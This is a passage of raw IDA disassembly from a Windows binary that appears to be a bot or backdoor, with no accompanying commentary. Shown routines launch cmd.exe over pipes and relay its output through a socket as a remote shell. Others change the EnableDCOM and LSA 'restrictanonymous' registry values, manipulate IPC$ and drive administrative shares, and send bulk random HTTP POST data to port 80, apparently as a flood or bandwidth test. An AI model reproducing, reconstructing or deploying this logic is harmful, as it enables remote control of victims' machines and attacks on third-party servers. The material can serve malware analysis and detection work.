call _sprintf
add esp, 0Ch
loc_41A9C3: ; CODE XREF: sub_41A969+41�j
lea eax, [ebp+Dest]
push 0
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Dest]
push eax
push [ebp+arg_0]
call dword_4E3148 ; send
test eax, eax
jg short loc_41A9EC
call sub_41A901
loc_41A9EC: ; CODE XREF: sub_41A969+7C�j
xor eax, eax
leave
retn
sub_41A969 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A9F0 proc near ; DATA XREF: sub_41AB45+174�o
Dst = byte ptr -20Ch
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20Ch
push ebx
push esi
push edi
mov esi, 200h
xor edi, edi
mov ebx, offset byte_4F3470
loc_41AA08: ; CODE XREF: sub_41A9F0+79�j
; sub_41A9F0+DB�j
push esi ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_4]
push edi
push edi
push eax
lea eax, [ebp+Dst]
push esi
push eax
push dword_4F3464
call ds:dword_4F5460 ; PeekNamedPipe
test eax, eax
jz loc_41AAD6
cmp [ebp+var_4], edi
jnz short loc_41AA6B
lea eax, [ebp+var_8]
push eax
push dword_4F3460
call ds:dword_4F545C ; GetExitCodeProcess
test eax, eax
jz short loc_41AA61
cmp [ebp+var_8], 103h
jnz loc_41AAFA
loc_41AA61: ; CODE XREF: sub_41A9F0+62�j
push 0Ah
call ds:dword_4F534C ; Sleep
jmp short loc_41AA08
; ---------------------------------------------------------------------------
loc_41AA6B: ; CODE XREF: sub_41A9F0+4E�j
xor eax, eax
cmp [ebp+var_4], edi
jbe short loc_41AA82
loc_41AA72: ; CODE XREF: sub_41A9F0+90�j
cmp [ebp+eax+Dst], 0Ah
jz short loc_41AAD0
inc eax
cmp eax, [ebp+var_4]
jb short loc_41AA72
loc_41AA82: ; CODE XREF: sub_41A9F0+80�j
mov [ebp+var_4], esi
loc_41AA85: ; CODE XREF: sub_41A9F0+E4�j
push esi ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_C]
push edi
push eax
push [ebp+var_4]
lea eax, [ebp+Dst]
push eax
push dword_4F3464
call ds:dword_4F53BC ; ReadFile
test eax, eax
jz short loc_41AB22
lea eax, [ebp+Dst]
push eax ; int
push ebx ; Str1
push dword_4F34A4 ; int
call sub_41A969
add esp, 0Ch
jmp loc_41AA08
; ---------------------------------------------------------------------------
loc_41AAD0: ; CODE XREF: sub_41A9F0+8A�j
inc eax
mov [ebp+var_4], eax
jmp short loc_41AA85
; ---------------------------------------------------------------------------
loc_41AAD6: ; CODE XREF: sub_41A9F0+45�j
push offset unk_450E24 ; int
push ebx ; Str1
push dword_4F34A4 ; int
call sub_41A969
push [ebp+arg_0]
call sub_40BA72
add esp, 10h
push 1
call ds:dword_4F53A0 ; ExitThread
loc_41AAFA: ; CODE XREF: sub_41A9F0+6B�j
call sub_41A901
push offset unk_450E54 ; int
push ebx ; Str1
push dword_4F34A4 ; int
call sub_41A969
push [ebp+arg_0]
call sub_40BA72
add esp, 10h
push edi
call ds:dword_4F53A0 ; ExitThread
loc_41AB22: ; CODE XREF: sub_41A9F0+C3�j
push offset unk_450E7C ; int
push ebx ; Str1
push dword_4F34A4 ; int
call sub_41A969
push [ebp+arg_0]
call sub_40BA72
add esp, 10h
push edi
call ds:dword_4F53A0 ; ExitThread
sub_41A9F0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AB45 proc near ; CODE XREF: sub_401CC7+24F8�p
; sub_4167BF+99�p
Dest = byte ptr -378h
var_178 = byte ptr -178h
var_74 = dword ptr -74h
var_48 = dword ptr -48h
var_44 = word ptr -44h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
Dst = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 378h
push esi
push edi
call sub_41A901
xor esi, esi
lea eax, [ebp+var_178]
push esi
push eax
push 104h
push esi
push offset aCmd_exe_0 ; "cmd.exe"
push esi
call dword_4E31B4 ; SearchPathA
test eax, eax
jz loc_41AC3F
lea eax, [ebp+var_1C]
mov edi, ds:dword_4F53D0
push esi
push eax
lea eax, [ebp+var_C]
mov [ebp+var_1C], 0Ch
push eax
lea eax, [ebp+var_10]
push eax
mov [ebp+var_14], 1
mov [ebp+var_18], esi
call edi ; CreatePipe
test eax, eax
jz loc_41AC3F
lea eax, [ebp+var_1C]
push esi
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
call edi ; CreatePipe
test eax, eax
jz loc_41AC3F
mov edi, ds:dword_4F53CC
push 3
push esi
push esi
push offset dword_4F3468
call edi ; GetCurrentProcess
push eax
push [ebp+var_8]
call edi ; GetCurrentProcess
push eax
call ds:dword_4F53C8 ; DuplicateHandle
test eax, eax
jz short loc_41AC3F
push 10h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
push 44h
lea eax, [ebp+var_74]
pop edi
push edi ; Size
push esi ; Val
push eax ; Dst
call _memset
mov eax, [ebp+var_4]
add esp, 18h
mov [ebp+var_3C], eax
mov eax, [ebp+var_C]
mov [ebp+var_38], eax
mov [ebp+var_34], eax
lea eax, [ebp+Dst]
mov [ebp+var_74], edi
push eax
lea eax, [ebp+var_74]
push eax
push esi
push esi
push esi
push 1
push esi
push esi
lea eax, [ebp+var_178]
push offset dword_4F34B0
push eax
mov [ebp+var_48], 101h
mov [ebp+var_44], si
call ds:dword_4F5340 ; CreateProcessA
test eax, eax
jnz short loc_41AC47
loc_41AC3F: ; CODE XREF: sub_41AB45+2E�j
; sub_41AB45+5C�j ...
or eax, 0FFFFFFFFh
jmp loc_41ACF9
; ---------------------------------------------------------------------------
loc_41AC47: ; CODE XREF: sub_41AB45+F8�j
push [ebp+var_4]
mov edi, ds:dword_4F533C
call edi ; CloseHandle
mov eax, [ebp+var_10]
push [ebp+var_28]
mov dword_4F3464, eax
mov eax, [ebp+var_8]
mov dword_4F346C, eax
mov eax, [ebp+Dst]
mov dword_4F3460, eax
call edi ; CloseHandle
mov eax, [ebp+arg_0]
cmp [ebp+arg_4], esi
mov dword_4F34A4, eax
jz short loc_41AC81
push [ebp+arg_4]
jmp short loc_41AC86
; ---------------------------------------------------------------------------
loc_41AC81: ; CODE XREF: sub_41AB45+135�j
push offset byte_4F34B4 ; Format
loc_41AC86: ; CODE XREF: sub_41AB45+13A�j
push offset byte_4F3470 ; Dest
call _sprintf
pop ecx
pop ecx
push esi ; int
push 0Ah ; int
push offset asc_450EB4 ; "-"
call sub_40B756
mov edi, eax
mov ecx, [ebp+var_24]
imul edi, 234h
add esp, 0Ch
mov dword_456020[edi], ecx
lea ecx, [ebp+var_30]
push ecx
push esi
push eax
push offset sub_41A9F0
push esi
push esi
call ds:dword_4F5350 ; CreateThread
cmp eax, esi
mov dword_45602C[edi], eax
jnz short loc_41ACF7
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Dest]
push offset asc_450ED8 ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dest]
push eax
call sub_415C3F
add esp, 10h
loc_41ACF7: ; CODE XREF: sub_41AB45+189�j
xor eax, eax
loc_41ACF9: ; CODE XREF: sub_41AB45+FD�j
pop edi
pop esi
leave
retn
sub_41AB45 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41ACFD proc near ; DATA XREF: sub_401CC7+2DFC�o
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 98h
mov eax, [ebp+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+var_98]
rep movsd
pop edi
pop esi
push [ebp+var_8]
cmp [ebp+var_10], 0
mov dword ptr [eax+94h], 1
lea eax, [ebp+var_94]
push [ebp+var_C]
push eax
push [ebp+var_98]
jz short loc_41AD44
call sub_41AD5D
jmp short loc_41AD49
; ---------------------------------------------------------------------------
loc_41AD44: ; CODE XREF: sub_41ACFD+3E�j
call sub_41B081
loc_41AD49: ; CODE XREF: sub_41ACFD+45�j
add esp, 10h
push [ebp+var_14]
call sub_40BA72
pop ecx
push 0
call ds:dword_4F53A0 ; ExitThread
sub_41ACFD endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AD5D proc near ; CODE XREF: sub_41ACFD+40�p
Dest = byte ptr -214h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
Str = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 214h
push esi
push edi
xor edi, edi
cmp dword_4E31C8, edi
jnz loc_41AE8F
lea eax, [ebp+var_4]
mov esi, 80000002h
push eax
push 2001Fh
push edi
push offset aSoftwareMicros ; "Software\\Microsoft\\OLE"
push esi
call dword_4E3168 ; RegOpenKeyExA
test eax, eax
jnz short loc_41ADE8
mov ax, word_450F50
mov word ptr [ebp+Str+2], ax
lea eax, [ebp+Str+2]
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str+2]
push eax
push 1
push edi
push offset aEnabledcom ; "EnableDCOM"
push [ebp+var_4]
call dword_4E311C ; RegSetValueExA
test eax, eax
jz short loc_41ADCA
push offset dword_450F60
jmp short loc_41ADCF
; ---------------------------------------------------------------------------
loc_41ADCA: ; CODE XREF: sub_41AD5D+64�j
push offset asc_450F84 ; "-"
loc_41ADCF: ; CODE XREF: sub_41AD5D+6B�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
push [ebp+var_4]
call dword_4E30D4 ; RegCloseKey
jmp short loc_41ADFB
; ---------------------------------------------------------------------------
loc_41ADE8: ; CODE XREF: sub_41AD5D+36�j
lea eax, [ebp+Dest]
push offset asc_450FA4 ; "-"
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_41ADFB: ; CODE XREF: sub_41AD5D+89�j
cmp [ebp+arg_C], edi
jnz short loc_41AE1A
push 1 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_409D34
add esp, 14h
loc_41AE1A: ; CODE XREF: sub_41AD5D+A1�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
pop ecx
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push edi
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control\\Lsa"
push esi
call dword_4E3168 ; RegOpenKeyExA
test eax, eax
jnz short loc_41AE88
lea eax, [ebp+Str]
push 4
push eax
push 4
push edi
push offset aRestrictanonym ; "restrictanonymous"
push [ebp+var_4]
mov dword ptr [ebp+Str], 1
call dword_4E311C ; RegSetValueExA
test eax, eax
jz short loc_41AE6A
push offset dword_450FE8
jmp short loc_41AE6F
; ---------------------------------------------------------------------------
loc_41AE6A: ; CODE XREF: sub_41AD5D+104�j
push offset asc_451024 ; "-"
loc_41AE6F: ; CODE XREF: sub_41AD5D+10B�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
push [ebp+var_4]
call dword_4E30D4 ; RegCloseKey
jmp short loc_41AEA2
; ---------------------------------------------------------------------------
loc_41AE88: ; CODE XREF: sub_41AD5D+E2�j
push offset dword_451058
jmp short loc_41AE94
; ---------------------------------------------------------------------------
loc_41AE8F: ; CODE XREF: sub_41AD5D+13�j
push offset asc_451094 ; "-"
loc_41AE94: ; CODE XREF: sub_41AD5D+130�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_41AEA2: ; CODE XREF: sub_41AD5D+129�j
cmp [ebp+arg_C], edi
jnz short loc_41AEC1
push 1 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_409D34
add esp, 14h
loc_41AEC1: ; CODE XREF: sub_41AD5D+148�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
cmp dword_4E31F0, edi
pop ecx
jnz loc_41B03C
push ebx
mov [ebp+var_4], edi
mov [ebp+var_14], edi
mov [ebp+var_C], edi
loc_41AEE4: ; CODE XREF: sub_41AD5D+2C3�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+Str]
push 0FFFFFFFFh
push eax
push 1F6h
push edi
call dword_4E303C
cmp eax, edi
mov [ebp+var_10], eax
jz short loc_41AF81
cmp eax, 0EAh
jz short loc_41AF81
mov esi, offset off_450F10
loc_41AF15: ; CODE XREF: sub_41AD5D+21D�j
push dword ptr [esi]
push edi
call sub_419B38
pop ecx
pop ecx
push dword ptr [esi]
test eax, eax
jnz short loc_41AF2C
push offset dword_451114
jmp short loc_41AF31
; ---------------------------------------------------------------------------
loc_41AF2C: ; CODE XREF: sub_41AD5D+1C6�j
push offset asc_451138 ; "-"
loc_41AF31: ; CODE XREF: sub_41AD5D+1CD�j
lea eax, [ebp+Dest]
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 10h
cmp [ebp+arg_C], edi
jnz short loc_41AF64
push 1 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_409D34
add esp, 14h
loc_41AF64: ; CODE XREF: sub_41AD5D+1EB�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
add esi, 8
pop ecx
cmp esi, offset aIpc ; "IPC$"
jb short loc_41AF15
jmp loc_41B019
; ---------------------------------------------------------------------------
loc_41AF81: ; CODE XREF: sub_41AD5D+1AA�j
; sub_41AD5D+1B1�j
mov esi, dword ptr [ebp+Str]
push 1
pop ebx
cmp [ebp+var_4], ebx
jb loc_41B010
loc_41AF90: ; CODE XREF: sub_41AD5D+2AF�j
mov edi, [esi]
push edi ; Str
call _wcslen
cmp word ptr [edi+eax*2-2], 24h
pop ecx
jnz short loc_41B005
push edi
call sub_419A25
push eax
push 0
call sub_419B38
add esp, 0Ch
push dword ptr [esi]
test eax, eax
jnz short loc_41AFBF
push offset dword_4510C4
jmp short loc_41AFC4
; ---------------------------------------------------------------------------
loc_41AFBF: ; CODE XREF: sub_41AD5D+259�j
push offset asc_4510E8 ; "-"
loc_41AFC4: ; CODE XREF: sub_41AD5D+260�j
lea eax, [ebp+Dest]
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 10h
cmp [ebp+arg_C], 0
jnz short loc_41AFF8
push 1 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_409D34
add esp, 14h
loc_41AFF8: ; CODE XREF: sub_41AD5D+27F�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
pop ecx
loc_41B005: ; CODE XREF: sub_41AD5D+242�j
add esi, 28h
inc ebx
cmp ebx, [ebp+var_4]
jbe short loc_41AF90
xor edi, edi
loc_41B010: ; CODE XREF: sub_41AD5D+22D�j
push dword ptr [ebp+Str]
call dword_4E3188
loc_41B019: ; CODE XREF: sub_41AD5D+21F�j
cmp [ebp+var_10], 0EAh
jz loc_41AEE4
lea eax, [ebp+Dest]
push offset asc_451164 ; "-"
push eax ; Dest
call _sprintf
pop ecx
pop ecx
pop ebx
jmp short loc_41B04F
; ---------------------------------------------------------------------------
loc_41B03C: ; CODE XREF: sub_41AD5D+177�j
lea eax, [ebp+Dest]
push offset asc_45118C ; "-"
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_41B04F: ; CODE XREF: sub_41AD5D+2DD�j
cmp [ebp+arg_C], edi
jnz short loc_41B06D
push edi ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_409D34
add esp, 14h
loc_41B06D: ; CODE XREF: sub_41AD5D+2F5�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
pop ecx
push 1
pop eax
pop edi
pop esi
leave
retn
sub_41AD5D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B081 proc near ; CODE XREF: sub_41ACFD:loc_41AD44�p
Dest = byte ptr -220h
var_20 = dword ptr -20h
var_14 = byte ptr -14h
Str = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 220h
push esi
push edi
xor edi, edi
cmp dword_4E31C8, edi
jnz loc_41B1AF
lea eax, [ebp+var_4]
mov esi, 80000002h
push eax
push 2001Fh
push edi
push offset aSoftwareMicros ; "Software\\Microsoft\\OLE"
push esi
call dword_4E3168 ; RegOpenKeyExA
test eax, eax
jnz short loc_41B10C
mov ax, word_4511BC
mov word ptr [ebp+Str+2], ax
lea eax, [ebp+Str+2]
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str+2]
push eax
push 1
push edi
push offset aEnabledcom_0 ; "EnableDCOM"
push [ebp+var_4]
call dword_4E311C ; RegSetValueExA
test eax, eax
jz short loc_41B0EE
push offset dword_4511CC
jmp short loc_41B0F3
; ---------------------------------------------------------------------------
loc_41B0EE: ; CODE XREF: sub_41B081+64�j
push offset asc_4511F0 ; "-"
loc_41B0F3: ; CODE XREF: sub_41B081+6B�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
push [ebp+var_4]
call dword_4E30D4 ; RegCloseKey
jmp short loc_41B11F
; ---------------------------------------------------------------------------
loc_41B10C: ; CODE XREF: sub_41B081+36�j
lea eax, [ebp+Dest]
push offset asc_45120C ; "-"
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_41B11F: ; CODE XREF: sub_41B081+89�j
cmp [ebp+arg_C], edi
jnz short loc_41B13E
push 1 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_409D34
add esp, 14h
loc_41B13E: ; CODE XREF: sub_41B081+A1�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
pop ecx
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push edi
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control\\Lsa"
push esi
call dword_4E3168 ; RegOpenKeyExA
test eax, eax
jnz short loc_41B1A8
lea eax, [ebp+Str]
push 4
push eax
push 4
push edi
push offset aRestrictanon_0 ; "restrictanonymous"
push [ebp+var_4]
mov dword ptr [ebp+Str], edi
call dword_4E311C ; RegSetValueExA
test eax, eax
jz short loc_41B18A
push offset dword_451250
jmp short loc_41B18F
; ---------------------------------------------------------------------------
loc_41B18A: ; CODE XREF: sub_41B081+100�j
push offset asc_451290 ; "-"
loc_41B18F: ; CODE XREF: sub_41B081+107�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
push [ebp+var_4]
call dword_4E30D4 ; RegCloseKey
jmp short loc_41B1C2
; ---------------------------------------------------------------------------
loc_41B1A8: ; CODE XREF: sub_41B081+E2�j
push offset dword_4512C8
jmp short loc_41B1B4
; ---------------------------------------------------------------------------
loc_41B1AF: ; CODE XREF: sub_41B081+13�j
push offset asc_451304 ; "-"
loc_41B1B4: ; CODE XREF: sub_41B081+12C�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_41B1C2: ; CODE XREF: sub_41B081+125�j
cmp [ebp+arg_C], edi
jnz short loc_41B1E1
push 1 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_409D34
add esp, 14h
loc_41B1E1: ; CODE XREF: sub_41B081+144�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
cmp dword_4E31F0, edi
pop ecx
jnz loc_41B356
mov esi, offset off_450F10
loc_41B1FF: ; CODE XREF: sub_41B081+1E7�j
push dword ptr [esi+4] ; int
push dword ptr [esi] ; Str
push edi ; int
call sub_419A8C
add esp, 0Ch
push dword ptr [esi]
test eax, eax
jnz short loc_41B21A
push offset dword_451334
jmp short loc_41B21F
; ---------------------------------------------------------------------------
loc_41B21A: ; CODE XREF: sub_41B081+190�j
push offset asc_451354 ; "-"
loc_41B21F: ; CODE XREF: sub_41B081+197�j
lea eax, [ebp+Dest]
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 10h
cmp [ebp+arg_C], edi
jnz short loc_41B252
push 1 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_409D34
add esp, 14h
loc_41B252: ; CODE XREF: sub_41B081+1B5�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
add esi, 8
pop ecx
cmp esi, offset off_450F20
jb short loc_41B1FF
push ebx
call ds:dword_4F5464 ; GetLogicalDrives
mov edi, eax
mov bl, 41h
test edi, edi
jz loc_41B33E
loc_41B27D: ; CODE XREF: sub_41B081+2B7�j
mov eax, edi
and eax, 1
cmp al, 1
jnz loc_41B334
cmp bl, 41h
jz loc_41B334
movsx esi, bl
push esi
push offset aC_1 ; "%c$"
lea eax, [ebp+var_14]
push 0Ah ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+var_20]
push esi
push offset aC_0 ; "%c:\\"
push 0Ah ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+var_20]
push eax
call dword_4E3158 ; GetDriveTypeA
cmp eax, 3
jnz short loc_41B334
lea eax, [ebp+var_20]
push eax ; int
lea eax, [ebp+var_14]
push eax ; Str
push 0 ; int
call sub_419A8C
add esp, 0Ch
test eax, eax
lea eax, [ebp+var_14]
push eax
jnz short loc_41B2EE
push offset dword_451388
jmp short loc_41B2F3
; ---------------------------------------------------------------------------
loc_41B2EE: ; CODE XREF: sub_41B081+264�j
push offset asc_4513A8 ; "-"
loc_41B2F3: ; CODE XREF: sub_41B081+26B�j
lea eax, [ebp+Dest]
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 10h
cmp [ebp+arg_C], 0
jnz short loc_41B327
push 1 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_409D34
add esp, 14h
loc_41B327: ; CODE XREF: sub_41B081+28A�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
pop ecx
loc_41B334: ; CODE XREF: sub_41B081+203�j
; sub_41B081+20C�j ...
inc bl
shr edi, 1
jnz loc_41B27D
loc_41B33E: ; CODE XREF: sub_41B081+1F6�j
lea eax, [ebp+Dest]
push offset asc_4513D0 ; "-"
push eax ; Dest
call _sprintf
pop ecx
xor edi, edi
pop ecx
pop ebx
jmp short loc_41B369
; ---------------------------------------------------------------------------
loc_41B356: ; CODE XREF: sub_41B081+173�j
lea eax, [ebp+Dest]
push offset asc_4513F4 ; "-"
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_41B369: ; CODE XREF: sub_41B081+2D3�j
cmp [ebp+arg_C], edi
jnz short loc_41B387
push edi ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_409D34
add esp, 14h
loc_41B387: ; CODE XREF: sub_41B081+2EB�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
pop ecx
push 1
pop eax
pop edi
pop esi
leave
retn
sub_41B081 endp
; =============== S U B R O U T I N E =======================================
sub_41B39B proc near ; CODE XREF: sub_41B592+CB�p
; sub_41B592+DD�p ...
arg_0 = dword ptr 4
call ds:dword_4F537C ; GetTickCount
push eax ; Seed
call _srand
pop ecx
call _rand
cdq
idiv [esp+arg_0]
mov eax, edx
retn
sub_41B39B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41B3B5(char *Str)
sub_41B3B5 proc near ; CODE XREF: sub_41B592+D4�p
; sub_41B592+E6�p ...
var_38 = dword ptr -38h
Dst = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_18 = qword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
Memory = dword ptr -8
var_4 = dword ptr -4
Str = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
push edi
push [ebp+Str] ; Str
call _strlen
mov esi, 0FFh
pop ecx
cmp eax, esi
ja loc_41B58E
push 10h ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
push [ebp+Str]
mov [ebp+Dst], 2
call sub_40AE55
add esp, 10h
mov [ebp+var_24], eax
test eax, eax
jz loc_41B58E
push 50h
call dword_4E30F8 ; htons
push 6
push 1
push 2
mov [ebp+var_26], ax
call dword_4E3178 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_41B58E
lea ecx, [ebp+Dst]
push 10h
push ecx
push eax
call dword_4E30A0 ; connect
cmp eax, 0FFFFFFFFh
jz loc_41B58E
push 32003h ; unsigned int
call ??2@YAPAXI@Z ; operator new(uint)
mov edi, ds:dword_4F537C
mov ebx, eax
pop ecx
mov [ebp+Memory], ebx
call edi ; GetTickCount
push eax ; Seed
call _srand
call _rand
cdq
idiv esi
mov [esp+38h+var_38], 32001h
push 0 ; Val
push ebx ; Dst
movsx esi, dl
call _memset
push 32000h ; Size
push esi ; Val
push ebx ; Dst
call _memset
push ebx ; Str
call _strlen
push 323EAh ; unsigned int
mov ebx, eax
call ??2@YAPAXI@Z ; operator new(uint)
add esp, 20h
mov esi, eax
push ebx
push [ebp+Str]
push offset aPostHttp1_0Hos ; "POST / HTTP/1.0\r\nHost: %s\r\nContent-Leng"...
push esi ; Dest
call _sprintf
push [ebp+Memory] ; Source
push esi ; Dest
call _strcat
push offset asc_451458 ; "\r\n"
push esi ; Dest
call _strcat
push esi ; Str
call _strlen
mov ebx, eax
add esp, 24h
mov [ebp+var_10], ebx
call edi ; GetTickCount
mov dword ptr [ebp+var_18+4], eax
xor eax, eax
test ebx, ebx
mov [ebp+Str], eax
jbe short loc_41B50E
mov [ebp+var_C], ebx
mov ebx, 400h
jmp short loc_41B4DE
; ---------------------------------------------------------------------------
loc_41B4DB: ; CODE XREF: sub_41B3B5+157�j
mov eax, [ebp+Str]
loc_41B4DE: ; CODE XREF: sub_41B3B5+124�j
mov ecx, [ebp+var_10]
push 0
sub ecx, eax
cmp ecx, ebx
jnb short loc_41B4EE
push [ebp+var_C]
jmp short loc_41B4EF
; ---------------------------------------------------------------------------
loc_41B4EE: ; CODE XREF: sub_41B3B5+132�j
push ebx
loc_41B4EF: ; CODE XREF: sub_41B3B5+137�j
add eax, esi
push eax
push [ebp+var_4]
call dword_4E3148 ; send
cmp eax, 0FFFFFFFFh
jz short loc_41B575
add [ebp+Str], ebx
sub [ebp+var_C], ebx
mov eax, [ebp+Str]
cmp eax, [ebp+var_10]
jb short loc_41B4DB
loc_41B50E: ; CODE XREF: sub_41B3B5+11A�j
call edi ; GetTickCount
sub eax, dword ptr [ebp+var_18+4]
and dword ptr [ebp+var_18+4], 0
mov dword ptr [ebp+var_18], eax
fild [ebp+var_18]
fmul ds:flt_43C4F4
fst [ebp+Str]
fcomp ds:flt_43C4F0
fnstsw ax
sahf
jnz short loc_41B536
fld1
fstp [ebp+Str]
loc_41B536: ; CODE XREF: sub_41B3B5+17A�j
push [ebp+var_4]
call dword_4E3190 ; closesocket
push [ebp+Memory] ; Memory
call _free
push esi ; Memory
call _free
mov eax, [ebp+var_10]
and dword ptr [ebp+var_18+4], 0
mov dword ptr [ebp+var_18], eax
pop ecx
fild [ebp+var_18]
pop ecx
fdiv [ebp+Str]
fmul ds:flt_43C4EC
fmul ds:flt_43C4E8
call __ftol
loc_41B570: ; CODE XREF: sub_41B3B5+1DB�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41B575: ; CODE XREF: sub_41B3B5+149�j
push [ebp+var_4]
call dword_4E3190 ; closesocket
push [ebp+Memory] ; Memory
call _free
push esi ; Memory
call _free
pop ecx
pop ecx
loc_41B58E: ; CODE XREF: sub_41B3B5+19�j
; sub_41B3B5+42�j ...
xor eax, eax
jmp short loc_41B570
sub_41B3B5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41B592(int,char *Str,int)
sub_41B592 proc near ; CODE XREF: sub_401CC7+2E52�p
Dest = byte ptr -26Ch
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
